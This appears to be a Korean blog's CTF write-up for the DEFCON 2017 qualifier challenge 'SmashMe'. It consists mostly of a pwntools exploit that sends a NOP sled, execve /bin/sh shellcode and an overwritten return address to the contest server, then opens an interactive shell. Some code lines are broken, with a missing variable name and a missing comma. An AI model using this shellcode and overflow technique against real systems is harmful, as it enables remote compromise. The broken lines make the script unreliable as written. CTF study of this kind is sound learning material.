$bash

DEFCON_2017 - SmashMe

0x0400 : Wargame/0x0410 : CTF
1
2
3
4
5
6
7
8
9
10
11
from pwn import *
= remote("smashme_omgbabysfirst.quals.shallweplayage.me"57348)
s.recv(1024)
 
payload  = "\x90"*6
payload += "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 
# shellcode 27bit
payload += "smash me outside how bout dAAAAAAAAAAA"
payload += "\x1b\x4e\x4c"
 
s.sendline(payload)
s.interactive()
cs


'0x0400 : Wargame > 0x0410 : CTF' 카테고리의 다른 글

2017 Hust CTF write up  (0) 2017.05.28
defcon2016 - [rev]baby-re  (0) 2017.05.21
RCTF - [misc]intoU  (0) 2017.05.21
TAMU CTF - pwnable(1~4)  (0) 2017.04.23
Defcon 23 - babycmd  (0) 2017.01.12